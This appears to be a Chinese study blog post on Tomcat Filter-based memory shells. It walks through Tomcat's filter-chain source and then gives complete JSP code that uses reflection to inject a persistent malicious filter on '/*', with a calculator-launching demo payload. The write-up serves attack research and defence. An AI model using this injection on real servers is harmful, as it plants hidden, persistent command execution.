内存马二：Filter

Filter内存马

源码学习

首先写一个普通的Filter了解一下重点数据的传递过程，断点到内部的一行，往上找。

回到的是org.apache.catalina.core.ApplicationFilterChain#internalDoFilter，这部分找到filters

找filters的赋值的地方，找到ApplicationFilterChain#addFilter有两个被调用的地方，很近，随便点一个

现在我们在ApplicationFilterFactory#createFilterChain，观察一下逻辑：遍历filtermaps，找到对应name的config加进filterChain。现在的重点关注对象就是两个数据filterConfig和filterMaps，都是从StandardContext获取的

去看StandardContext中的这两个数据。

先看filterConfigs的赋值的地方，找到StandardContext#filterStart，观察filterConfig的KV就是来自filterDefs。也就是说在filterDefs放入数据后再调用filterStart就可以实现filterConfig的赋值。

再看filterMaps，一样的方法，发现都出了StandardContext了，直接在StandardContext里改值就行了

编写思路

1. 写一个恶意filter类
2. 拿到StandardContext
3. filterDefs加一个值
4. filterMaps加一个值
5. 调用filterStart方法

注：要先加filterDef再加filterMap，因为加filterMap时会先验证filterDef中有没有，没有会抛异常

访问这个jsp页面后filter会被加载到内存中，再次发出符合filter过滤条件的请求时将触发恶意的TomcatFilterShell#doFilter

完整代码

<%@ page import="java.io.IOException" %> <%@ page import="org.apache.catalina.core.StandardContext" %> <%@ page import="java.lang.reflect.Field" %> <%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %> <%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %> <%@ page import="org.apache.catalina.core.ApplicationContext" %><%-- <%--一个恶意filter类--%> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <%! public class TomcatFilterShell implements Filter { @Override public void init(FilterConfig filterConfig) throws ServletException { System.out.println("AddTomcatFilter initialized"); } @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { Runtime.getRuntime().exec("open -a Calculator");//macos chain.doFilter(request, response); } @Override public void destroy() { System.out.println("AddTomcatFilter destroyed"); } } %> <% try{ String filterName = "filterShell"; // 1.从request中获取servletContext ServletContext servletContext = request.getServletContext(); // 从servletContext中获取applicationContext Field applicationContextField = servletContext.getClass().getDeclaredField("context"); applicationContextField.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext); // 从applicationContext中获取standardContext Field standardContextField = applicationContext.getClass().getDeclaredField("context"); standardContextField.setAccessible(true); StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext); // 2、filterDef加入值 FilterDef filterDef = new FilterDef(); filterDef.setFilterName(filterName); filterDef.setFilterClass(TomcatFilterShell.class.getName()); filterDef.setFilter(new TomcatFilterShell()); standardContext.addFilterDef(filterDef); standardContext.addFilterDef(filterDef); // 3、filterMaps加入值 FilterMap filterMap = new FilterMap(); filterMap.setFilterName(filterName); filterMap.addURLPattern("/*"); standardContext.addFilterMapBefore(filterMap); // 4、调用filterStart方法 standardContext.filterStart(); out.println("Filter注入成功"); }catch (Exception e){ e.printStackTrace(); out.println("Filter注入失败"); } %>

参考内容

https://su18.org/post/memory-shell/

https://www.bilibili.com/video/BV1HaGPzcENy